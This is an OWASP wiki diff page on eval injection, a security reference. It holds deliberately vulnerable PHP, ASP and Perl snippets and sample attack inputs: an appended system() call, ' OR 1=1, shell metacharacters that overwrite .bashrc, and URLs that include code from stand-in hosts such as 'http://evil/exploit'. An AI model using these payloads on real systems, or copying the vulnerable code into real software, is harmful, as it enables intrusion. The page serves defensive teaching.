Difference between revisions of "Direct Dynamic Code Evaluation ('Eval Injection')"

From OWASP
Jump to: navigation, search
(Added attack to Injection subcategory)
 
(38 intermediate revisions by 5 users not shown)
Line 1: Line 1:
 
{{Template:Attack}}
 
{{Template:Attack}}
 +
 +
<br>
 +
[[Category:OWASP ASDR Project]]
 +
 +
 +
Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''
  
 
==Description==
 
==Description==
  
This attack consists in a script does not properly validate user inputs in the page parameter.  A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.
+
This attack consists of a script that does not properly validate user inputs in the page parameter.  A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement, which results in code execution.
  
 
Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.
 
Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.
Line 9: Line 15:
 
Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.
 
Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.
  
==Examples ==
+
==Risk Factors==
 +
TBD
 +
[[Category:FIXME|need content here]]
  
===Example 1===
+
==Examples==
  
 +
===Example 1===
 
In this example an attacker can control all or part of an input string that is fed into an eval() function call
 
In this example an attacker can control all or part of an input string that is fed into an eval() function call
  
Line 23: Line 32:
 
The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".
 
The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".
  
===Eaxmple 2===
+
===Example 2===
 
+
The following is an example of [[SQL Injection]]. Consider a web page which has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:  
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:  
+
 
  SELECT UserList.Username
 
  SELECT UserList.Username
 
  FROM UserList
 
  FROM UserList
Line 32: Line 40:
 
  AND UserList.Password = 'Password'
 
  AND UserList.Password = 'Password'
  
If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
+
If this query returns exactly one row, then access is granted. However, if a malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
 
  SELECT UserList.Username
 
  SELECT UserList.Username
 
  FROM UserList
 
  FROM UserList
Line 42: Line 50:
  
 
===Example 3===
 
===Example 3===
 
+
This is an example of a file that was injected. Consider this PHP program (which includes a file specified by request):
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):
+
  
 
<pre><nowiki>
 
<pre><nowiki>
Line 73: Line 80:
  
 
===Example 4===
 
===Example 4===
 
+
A simple URL which demonstrates a way to do this attack:
A simple URL which demonstrate a way to do this attack:
+
  
 
   <nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt?  </nowiki>
 
   <nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt?  </nowiki>
  
 
===Example 5===
 
===Example 5===
 +
Shell Injection applies to most systems which allow software to programmatically execute a Command line. Typical sources of Shell Injection are calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.
  
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.
+
Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word.
 
+
Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)
+
  
 
<pre><nowiki>
 
<pre><nowiki>
Line 105: Line 110:
  
 
===Example 6===
 
===Example 6===
 
+
The following code is vulnerable to eval() injection, because it don’t sanitize the user’s input (in this case: “username”). The program just saves this input in a txt file, and then the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.
+
  
 
Example:
 
Example:
Line 138: Line 142:
 
</nowiki></pre>
 
</nowiki></pre>
  
===Example 7===
+
==Related [[Threat Agents]]==
 +
* [[:Internal software developer]]
  
This is a example of HTML Injection in IE7 Via Infected DLL. According to [http://www.theregister.co.uk/2007/05/25/strange_spoofing_technique/ an article] in UK tech site The Register, HTML injection can also occur if the user has an infected DLL on their system.  The article quotes Roger Thompson who claims that "the victims' browsers are, in fact, visiting the PayPal website or other intended URL, but that a dll file that attaches itself to IE is managing to read and modify the html while in transit.  The article mentions a phishing attack using this attack that manages to bypass IE7 and Symantec's attempts to detect suspicious sites.
+
==Related [[Attacks]]==
 +
* [[Direct Static Code Injection]]
 +
* [[Code Injection]]
 +
* [[:Category:Injection Attack | Injection Attacks]]
  
===Example 8===
+
==Related [[Vulnerabilities]]==
Edit-config.pl: This CGI script is used to modify settings in a configuration file.
+
* [[:Category:Input Validation Vulnerability]]
  
\
+
==Related [[Controls]]==
use CGI qw(:standard);
+
* [[:Category:Input Validation]]
                       
+
sub config_file_add_key {
+
my ($fname, $key, $arg) = @_;
+
                       
+
# code to add a field/key to a file:
+
}
+
                       
+
sub config_file_set_key {
+
my ($fname, $key, $arg) = @_;
+
                       
+
# code to set key to a particular file:
+
}
+
                       
+
sub config_file_delete_key {
+
my ($fname, $key, $arg) = @_;
+
                       
+
# code to delete key from a particular file goes here
+
}
+
                       
+
sub handleConfigAction {
+
my ($fname, $action) = @_;
+
my $key = param('key');
+
my $val = param('val'); <br>
+
# this code is efficient especially when inoke a several different functions                       
+
     
+
my $code = "config_file_$action_key(\$fname, \$key, \$val);";
+
eval($code);
+
}
+
                       
+
$configfile = "/home/cwe/config.txt";
+
print header;
+
if (defined(param('action'))) {
+
handleConfigAction($configfile, param('action'));
+
}
+
else {
+
print "No action specified!\n";   
+
}
+
 
+
The script intends to take the 'action' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as: add_key(",","); system("/bin/ls"); This would produce the following string in handleConfigAction(): config_file_add_key(",","); system("/bin/ls"); Any arbitrary Perl code could be added after the attacker has "closed off" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker's payload is activated. This particular manipulation would fail after the system() call, because the "_key(\$fname, \$key, \$val)" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated.
+
  
 
==References==
 
==References==
*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
+
* http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
 
* http://en.wikipedia.org/wiki/Code_injection
 
* http://en.wikipedia.org/wiki/Code_injection
  
==Severity==
+
[[Category:Injection]]
 
+
[[Category: Attack]]
==Likelihood of exploitation==
+
__NOTOC__
 
+
==Related Threats==
+
[[:Category:Command Execution]]
+
 
+
==Related Attacks==
+
*[[Direct Static Code Injection]]
+
*[[Code Injection]]
+
*[[:Category:Injection Attack | Injection Attacks]]
+
 
+
 
+
==Related Vulnerabilities==
+
[[:Category:Input Validation Vulnerability]]
+
 
+
==Related Countermeasures==
+
[[:Category:Input Validation]]
+
 
+
 
+
[Category: Resource Manipulation]]
+

Latest revision as of 17:07, 6 December 2011

This is an Attack. To view all attacks, please see the Attack Category page.




Last revision: 12/6/2011

Description

This attack consists of a script that does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement, which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

Risk Factors

TBD

Examples

Example 1

In this example an attacker can control all or part of an input string that is fed into an eval() function call

  $myvar = "varname"; 
  $x = $_GET['arg']; 
  eval("\$myvar = \$x;"); 

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

Example 2

The following is an example of SQL Injection. Consider a web page which has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:

SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if a malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:

SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

Example 3

This is an example of a file that was injected. Consider this PHP program (which includes a file specified by request):

<?php
   $color = 'blue';
   if ( isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
?>
<form>
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>


The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

  • /vulnerable.php?COLOR=http://evil/exploit - injects a remotely hosted file containing an exploit.
  • /vulnerable.php?COLOR=C:\ftp\upload\exploit - injects an uploaded file containing an exploit.
  • /vulnerable.php?COLOR=..\..\..\..\ftp\upload\exploit - injects an uploaded file containing an exploit, using Path Traversal.
  • /vulnerable.php?COLOR=C:\notes.txt%00 - example using Null character, Meta character to remove the .php suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

Example 4

A simple URL which demonstrates a way to do this attack:

 http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt?  

Example 5

Shell Injection applies to most systems which allow software to programmatically execute a Command line. Typical sources of Shell Injection are calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called funnytext to replace a word the user sent with some other word.

<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext " 
           . $_GET['USER_INPUT'] );
?>

This program can be injected in multiple ways:

  • `command` will execute command.
  • $(command) will execute command.
  • ; command will execute command, and output result of command.
  • | command will execute command, and output result of command.
  • && command will execute command, and output result of command.
  • || command will execute command, and output result of command.
  • > /home/user/phpguru/.bashrc will overwrite file .bashrc.
  • < /home/user/phpguru/.bashrc will send file .bashrc as input to funnytext.

PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

Example 6

The following code is vulnerable to eval() injection, because it don’t sanitize the user’s input (in this case: “username”). The program just saves this input in a txt file, and then the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:

<%
	If not isEmpty(Request( "username" ) ) Then
		Const ForReading = 1, ForWriting = 2, ForAppending = 8
		Dim fso, f
		Set fso = CreateObject("Scripting.FileSystemObject")
		Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
		f.Write Request("username") & vbCrLf
		f.close
		Set f = nothing
		Set fso = Nothing
		%>
		<h1>List of logged users:</h1>
		<pre>
		<%
			Server.Execute( "userlog.txt" )
		%>
		</pre>
		<%
	Else
		%>
		<form>
			<input name="username" /><input type="submit" name="submit" />
		</form>
		<%
	End If
%>

Related Threat Agents

Related Attacks

Related Vulnerabilities

Related Controls

References